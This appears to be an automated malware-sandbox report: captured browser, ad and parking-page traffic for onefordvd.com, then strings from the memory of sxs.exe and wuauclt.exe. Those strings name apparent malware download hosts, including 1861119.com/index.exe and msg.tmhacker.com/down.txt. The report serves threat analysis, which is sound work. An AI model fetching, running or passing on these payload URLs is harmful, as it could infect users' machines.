Source: global traffic | HTTP traffic detected: GET /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1 | Host: api.aws.parking.godaddy.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | X-Request-Id: 29c03105-bfe3-4210-967e-5295b3a100a0 | sec-ch-ua-platform: "Windows" | Accept: */* | Origin: https://www.onefordvd.com | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /px.gif?ch=1&e=0.7379176731179411 HTTP/1.1 | Host: ad-delivery.net | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1 | Host: ad-delivery.net | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /px.gif?ch=1&e=0.7550573385120041 HTTP/1.1 | Host: ad-delivery.net | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1 | Host: ad.doubleclick.net | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1 | Host: ad-delivery.net | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3" | If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
Source: global traffic | HTTP traffic detected: GET /afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=1741724944339990&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944339992&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F HTTP/1.1 | Host: syndicatedsearch.goog | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: navigate | Sec-Fetch-Dest: iframe | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1 | Host: api.aws.parking.godaddy.com | Connection: keep-alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: */* | Sec-Fetch-Site: none | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Encoding: identity | If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT | Range: bytes=0-2147483646 | User-Agent: Microsoft BITS/7.8 | Host: fs.microsoft.com
Source: global traffic | HTTP traffic detected: GET /afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=2721724944340427&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944340430&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F HTTP/1.1 | Host: syndicatedsearch.goog | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: navigate | Sec-Fetch-Dest: iframe | Referer: https://www.onefordvd.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?pac=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /adsense/domains/caf.js?pac=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://syndicatedsearch.goog/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=11hs6q014uq&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=lhb5r7xl5det&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da
Source: global trafficHTTP traffic detected: GET /js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1Host: afs.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da
Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=g3yhpaijmirq&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bs&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=2gf50ip8fgbm&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0 HTTP/1.1Host: syndicatedsearch.googConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lFzGF6yeVbArfYs&MD=x6PWfleO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lFzGF6yeVbArfYs&MD=x6PWfleO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lander HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.onefordvd.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.onefordvd.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.onefordvd.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: expiry_partner=; caf_ipaddr=8.46.123.33; country=US; city=New%20York; lander_type=parking
Source: global trafficDNS traffic detected: DNS query: 1861119.com
Source: global trafficDNS traffic detected: DNS query: www.onefordvd.com
Source: global trafficDNS traffic detected: DNS query: msg.tmhacker.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: btloader.com
Source: global trafficDNS traffic detected: DNS query: img1.wsimg.com
Source: global trafficDNS traffic detected: DNS query: syndicatedsearch.goog
Source: global trafficDNS traffic detected: DNS query: ad-delivery.net
Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: api.aws.parking.godaddy.com
Source: global trafficDNS traffic detected: DNS query: afs.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: www.dvdforone.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: unknownHTTP traffic detected: POST /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1Host: api.aws.parking.godaddy.comConnection: keep-aliveContent-Length: 920sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://www.onefordvd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.onefordvd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: wuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/1.txt
Source: sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/1.txtO
Source: sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/1.txtW
Source: sxs.exe, 00000000.00000002.2041399746.0000000000859000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/1.txtnss
Source: sxs.exe, 00000000.00000003.2035087789.0000000002172000.00000004.00001000.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/ie.tx
Source: wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/ie.txt
Source: wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/ie.txt/
Source: sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/ie.txt_
Source: wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/ie.txthT;
Source: wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/ie.txtlate
Source: sxs.exe, 00000000.00000002.2041399746.0000000000868000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/ie.txt~
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002102000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exe
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exe$N
Source: sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exe.
Source: wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exe0U
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exe3N
Source: wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exe8
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exeE
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exeb1
Source: sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://1861119.com/index.exeq#
Source: chromecache_112.8.dr, chromecache_103.8.dr | String found in binary or memory: http://domainretailing.com/rg-dsale3p.php?d=onefordvd.com
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/down.txt
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/down.txtrj
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://msg.tmhacker.com/down.txtrp
